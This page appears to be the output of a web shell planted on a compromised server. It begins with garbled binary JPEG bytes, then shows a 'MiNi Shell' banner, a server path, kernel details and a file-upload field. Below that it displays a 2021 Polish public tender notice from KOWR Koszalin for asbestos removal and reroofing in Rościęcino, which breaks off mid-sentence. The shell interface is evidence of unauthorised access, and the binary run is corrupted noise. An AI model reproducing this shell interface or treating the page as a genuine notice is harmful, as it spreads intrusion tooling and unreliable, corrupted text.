JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210702/0010292001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00102920 z dnia 2021-07-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Demontaż azbestu oraz wykonanie pokrycia dachowego budynków<br/>i budowli położonych na terenie dz. nr 17/16 obręb Rościęcino, gmina<br/>Kołobrzeg – drugie postępowanie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Koszalinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Partyzantów 15A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.koszalin@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Demontaż azbestu oraz wykonanie pokrycia dachowego budynków<br/>i budowli położonych na terenie dz. nr 17/16 obręb Rościęcino, gmina<br/>Kołobrzeg – drugie postępowanie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d5272c2b-db21-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00102920</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009781/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Demontaż azbestu oraz wykonanie pokrycia dachowego budynków i budowli położonych na terenie dz. nr 17/16 obręb Rościęcino, gmina Kołobrzeg</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji<br/>elektronicznej, wyłącznie za pośrednictwem platformy zakupowej - pod adresem:<br/>https://kowr.eb2b.com.pl/ i pod numerem postępowania wskazanym w ust. 2.1 SWZ. Zapytania<br/>kierowane na adresy mailowe zamawiającego oraz skrzynkę ePUAP – nie będą rozpatrywane.<br/>Korzystanie z Platformy jest nieodpłatne. Korzystanie z Platformy wymaga zarejestrowania konta na<br/>Platformie. Opis sposobu rejestracji oraz czynności technicznych koniecznych do złożenia oferty lub<br/>innych dokumentów znajduje się w rozdziale 11 SWZ przedmiotowego postępowania -<br/>https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r., poz. 2452), określa dopuszczalne formaty<br/>przesyłanych danych: pliki o wielkości do 50 MB w formatach: .doc, .docx, .pdf, .zip, .rar., pades,<br/>xades, .xls, .xlsx. Wymagania techniczne i organizacyjne korzystania z Platformy określa Regulamin<br/>Platformy Zakupowej (dostępny pod adresem https://platforma.eb2b.com.pl/user/terms). Zamawiający,<br/>zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r., poz. 2452), określa następujące niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na Platformie: a) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 2 mb/s; b) komputer klasy PC lub PC lub MAC, o następującej<br/>konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; c) zainstalowana dowolna najnowsza wersja<br/>przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0; d) włączona obsługa<br/>JavaScript; e) zainstalowany program Acrobat Reader. Zamawiający, zgodnie z § 11 rozporządzenia<br/>Prezesa Rady Ministrów z dnia 30 grudnia2020r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r.,<br/>poz. 2452), określa informacje na temat kodowania i czasu odbioru danych: a) plik załączony przez<br/>Wykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość<br/>otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>składania ofert; b) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po prawej stronie dokumentu w<br/>kolumnie „Data przesłania”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych zgodnie z<br/>art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”<br/>znajduje się w rozdziale 25 SWZ przedmiotowego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KOS.WOP.SZP.260.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zmiany pokrycia dachowego w budynkach<br/>gospodarczych służących gospodarce rolnej położonych w miejscowości Rościęcino, gmina<br/>Kołobrzeg, powiat kołobrzeski, województwo zachodniopomorskie na działce nr 17/16 obręb<br/>Kołobrzeg, to jest:<br/>􀀀 chlewnia – nr inwentarzowy: 00131-33,<br/>􀀀 magazyn zbożowy – nr inwentarzowy: 00131-7,<br/>􀀀 obora – nr inwentarzowy: 00131-35,<br/>􀀀 obora – nr inwentarzowy: 00131-39.<br/>Zakres robót budowlanych obejmuje:<br/>1) rozebranie pokrycia dachowego z płyt azbestowo-cementowych falistych,<br/>2) wymianę łacenia dachu,<br/>3) montaż membrany dachowej paroprzepuszczalnej,<br/>4) pokrycie blachą powlekaną trapezową (T-35) lub blachą powlekaną dachówkową (blachodachówką) na łatach dachów o nachyleniu połaci do 85%<br/>- kolor blachy: srebrny,<br/>5) wykonanie obróbek z blachy ocynkowanej (pas nadrynnowy, pas kalenicowy, wiatrownice),<br/>6) montaż prefabrykowanych rynien dachowych półokrągłych o średnicy 15 cm z blachy<br/>ocynkowanej grubości 0,50mm,<br/>7) montaż zbiorniczków przy rynnach,<br/>8) montaż rur spustowych z blachy ocynkowanej grubości 0,50mm okrągłych o średnicy<br/>12,5cm,<br/>9) utylizację płyt azbestowo – cementowych (eternit falisty),<br/>10) uporządkowanie i oczyszczenie terenu z pozostałości po wykonanych pracach.<br/>Obiekty w których realizowane będą roboty znajdują się w bieżącym użytkowaniu.<br/>Wykonawca zobowiązany jest przeprowadzić prace w sposób nie zakłócający ciągłości ich funkcjonowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45262120-8 - Wznoszenie rusztowań</p> <p class="mb-0">45262660-5 - Usuwanie azbestu</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: I. nie podlegają wykluczeniu na<br/>podstawie art. 108 ust. 1 ustawy Pzp (obligatoryjne przesłanki wykluczenia) oraz na podstawie<br/>art. 109 ust. 1, 2, 3, 4, 5, 7 oraz 8 ustawy Pzp (fakultatywne przesłanki wykluczenia); II. spełniają<br/>warunki udziału w postępowaniu dotyczące: 1. zdolności występowania w obrocie<br/>gospodarczym Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 2.<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 3.<br/>sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek, jeżeli: a) posiada<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej<br/>związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 200.000,00zł. W<br/>przypadku wykonawców wspólnie ubiegających się o zamówienie, zamawiający uzna warunek<br/>za spełniony, jeżeli co najmniej jeden z wykonawców spełni powyższy warunek w całości<br/>samodzielnie, 4. zdolności technicznej lub zawodowej: Wykonawca spełni warunek, jeżeli: a)<br/>dysponuje co najmniej dwoma osobami przeszkolonymi przez uprawnioną instytucję w zakresie<br/>realizacji prac polegających na zabezpieczaniu i usuwaniu wyrobów zawierających azbest,<br/>bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu tych wyrobów oraz<br/>przestrzegania procedur dotyczących bezpiecznego postępowania oraz dysponuje jedną osobą<br/>pełniącą funkcję kierownika budowy, który posiada uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej. W przypadku wykonawców<br/>wspólnie ubiegających się o zamówienie, zamawiający uzna warunek za spełniony, jeżeli<br/>wykonawcy spełnią powyższy warunek łącznie. b) nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonali co najmniej dwie roboty budowlane polegające na budowie, rozbudowie,<br/>przebudowie obiektu/obiektów budowlanego/budowlanych w zakres których wchodziła wymiana<br/>lub wykonanie pokrycia dachowego o wartości zamówienia nie mniejszej niż 100.000,00zł brutto<br/>każda. W przypadku wykonawców<br/>wspólnie ubiegających się o zamówienie, zamawiający uzna warunek za spełniony, jeżeli<br/>wykonawcy spełnią powyższy warunek łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający informuje, że zgodnie z zapisami art. 273 ust. 1 ustawy Pzp nie będzie żądał od<br/>wykonawców podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia z<br/>postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający informuje, że zgodnie z zapisami art. 273 ust. 1 ustawy Pzp<br/>nie będzie żądał od wykonawców podmiotowych środków dowodowych na potwierdzenie spełniania<br/>warunków udziału w postępowaniu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Do uczestnictwa w postępowaniu wymagane jest wadium. Wadium wnosi się przed upływem<br/>terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. Wysokość wadium<br/>dla zadania ustala się w kwocie: 6.000,00 zł (słownie złotych: sześć tysięcy złotych 00/100).<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku formach<br/>określonych w art. 97 ust. 7 ustawy Pzp. Wadium wnoszone w pieniądzu wpłaca się wyłącznie<br/>przelewem na rachunek bankowy: Krajowego Ośrodka Wsparcia Rolnictwa w Koszalinie w<br/>banku BGK O/Szczecin na konto nr 10 1130 1176 0022 2115 1620 0002 z adnotacją: „Wadium<br/>– wymiana pokrycia dachowego – Rościęcino dz. nr 17/16 - drugie postępowanie”. Wadium wnoszone w innej formie<br/>niż w pieniądzu, powinno zawierać bezwzględne i nieodwołalne zobowiązanie podmiotu<br/>udzielającego gwarancji, do wypłaty kwoty wadium w przypadkach wymienionych w art. 98 ust 6<br/>ustawy Pzp. W przypadku gdy oferent wybierze wadium w postaci niepieniężnej, wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. Oferta<br/>wykonawcy, który nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał<br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3, zostanie odrzucona. Zamawiający zwraca<br/>wadium w przypadkach o których mowa w art. 98 ust. 1 i 2 ustawy Pzp. Zamawiający zatrzymuje<br/>wadium w przypadkach o których mowa w art. 98 ust. 6 ustawy Pzp. Zamawiający żąda<br/>ponownego wniesienia wadium przez wykonawcę, któremu zwrócono<br/>wadium na podstawie ust. 14.8 SWZ, jeżeli w wyniku rozstrzygnięcia<br/>odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w<br/>terminie określonym przez zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. W<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z nich nie<br/>może podlegać wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp i art. 109<br/>ust. 1, 2, 3, 4, 5, 7 oraz 8 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy w przypadku<br/>zaistnienia szczególnych okoliczności uniemożliwiających wykonywanie zamówienia, takich jak:<br/>1) warunki atmosferyczne:<br/>a) klęski żywiołowe,<br/>b) udokumentowane warunki atmosferyczne istotnie utrudniające terminową realizację<br/>przedmiotu umowy,<br/>2) zdarzenia będące następstwem działania osób trzecich,<br/>3) zdarzenia będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano<br/>Zamawiającego, za które Wykonawca nie ponosi odpowiedzialności.<br/>Zamawiający dopuszcza możliwość zmiany sposobu spełnienia świadczenia – zmiany<br/>technologiczne, w szczególności:<br/>1) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji spowodowana<br/>zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,<br/>2) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na<br/>zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego<br/>przedmiotu umowy,<br/>3) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na<br/>zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również<br/>kosztów eksploatacji wykonanego przedmiotu umowy,<br/>4) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji, w sytuacji,<br/>gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem 